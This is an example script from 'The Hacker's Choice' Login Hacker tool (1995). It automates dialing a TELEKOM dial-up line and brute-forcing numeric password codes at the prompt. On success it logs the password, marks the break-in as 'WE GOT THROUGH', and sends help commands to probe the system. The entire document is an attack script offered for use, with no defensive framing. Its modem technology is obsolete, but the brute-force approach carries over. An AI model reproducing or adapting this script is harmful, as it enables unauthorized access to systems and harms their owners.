;                     *********  *    *     ****
;                         *      *    *    *
;                         *      ******   *  
;                         *      *    *    *
;                         *      *    *     ****
;
;                         The Hacker's Choice
;                      Part I - The Login Hacker
;                 (c) 1995 by van Hauser/THC of L.o.r.E.
;-----------------------------------------------------------------------------
;
;                          SCRIPT EXAMPLE TWO
;
; System description : a TELEKOM dialup
;    After dialing the number you get an "PASSWORD:" prompt.
;    You have unlimited password tries ! We don't know what types
;    of passwords are used so this time we check for an number id code.
;    and of course we do that with the brute force option.
;
#DEFINE
INIT_MODEM=AT&N15
INIT_DATA=7E1
LOGFILE=C:\OUTPUT\TELEKOM4.LOG
PHONE_NR=I dont tell you ;)
DIAL_TRIES=3
LOGIN_TRIES=0
BRUTE(1)=1,1,1,12

#NOCARRIER
BEEP
BEEP
BEEP
LOG(NO CARRIER)
LOG(ON $DATE $TIME)
LOG(AT $BRUTE(1))
LOG()
GOTO(#START)

#START
LOG(--------------------------------------------------------------------------)
LOG(TARGET : $PHONE_NR    ON $DATE - $TIME)
LOG()
:1
LOG(Dialing ...)
HANGUP
DIAL
LOG($STRING)
WAIT4STRING(15,^M,4,GOTO(1),PA)
:2
SEND_NEXT_BRUTE(1)
WAIT4STRING(3,^M,2,GOTO(3),PA)
GOTO(2)
:3
LOG_SESSION_ON
SEND()
SEND(?)
SEND(HELP)
SEND(HILFE)
LOG()
LOG(!!!!! WE GOT THROUGH !!!!!!)
LOG(Password : $BRUTE(1))
LOG()
BEEP
BEEP
BEEP
BEEP
BEEP
HANGUP
GOTO(#END)

#END
